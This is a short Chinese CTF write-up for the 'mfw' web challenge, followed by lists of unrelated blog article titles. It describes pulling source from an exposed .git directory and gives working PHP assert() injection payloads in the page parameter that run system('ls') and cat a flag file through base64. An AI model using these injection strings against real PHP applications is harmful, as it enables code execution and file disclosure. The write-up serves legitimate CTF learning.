mfw

mfw是什么东西???

看题:

进来只有几个标签,挨着点一遍,到About页面

看到了Git,猜测有git泄露,访问/.git/HEAD成功

上Githack,但是会一直重复

按了一次ctrl+c就好了

有没有哪位大哥知道这是什么问题

然后用git log git diff试了一下,什么都没有,只好去看看代码

看到index.php的时候

发现assert里面的$file是可控的,所以可以进行命令注入

尝试?page=flag.php','..')==false and system('ls') and strpos('templates/flag

有回显,这里重复两次是因为红框下面还有一句assert

尝试爆flag?page=flag.php','..')==false and system('cat templates/flag.php') and strpos('templates/flag

!!!竟然没显示,然后试了好多都不行,最后想到返回php文件会因为特殊符号而报错,所以使用base64

payload:flag.php','..')==false and system('cat templates/flag.php | base64') and strpos('templates/flag

最新文章

  1. 项目开发(Require + E.js)
  2. 为input输入框添加圆角并去除阴影
  3. window10 安装出现the error code is 2503错误的解决方法
  4. 为什么要在html和body加上“height:100%;”
  5. 初学java之JFrame窗口模式
  6. 【LeetCode】6. ZigZag Conversion 锯齿形转换
  7. Java基本开发环境搭建
  8. [原创]javascript prototype 对象 函数 <精简的美丽......>
  9. 即时作图新工具—ProcessOn【推荐】
  10. Java中equals和==之间的区别
  11. PID控制器介绍
  12. [HNOI2010]平面图判定
  13. DevSecOps 运维模式中的安全性
  14. Tools - Windows系统下的命令行工具Cmder
  15. locust的安装与使用
  16. mybatis mapper使用记录
  17. Popupwindow全屏问题
  18. 36. Valid Sudoku (Array; HashTable)
  19. 【poj3133】 Manhattan Wiring
  20. Redis自学笔记 --string类型

热门文章

  1. 200-Java语言基础-Java编程入门-004 | Java分支与循环
  2. C# 应用 - 多线程 1) 多线程的知识图谱
  3. BuaacodingT651 我知道你不知道圣诞节做什么 题解(逻辑)
  4. Java学习历程记录(一)
  5. 前端性能监控之performance
  6. 攻防世界 resver catch-me
  7. SFDC 删除操作时:验证或触发后续操作的一般解决方案
  8. vue全局错误捕获
  9. 配置Java环境变量时的一个常见错误
  10. exec 跟 source 差在哪?-- Shell十三问<第六问>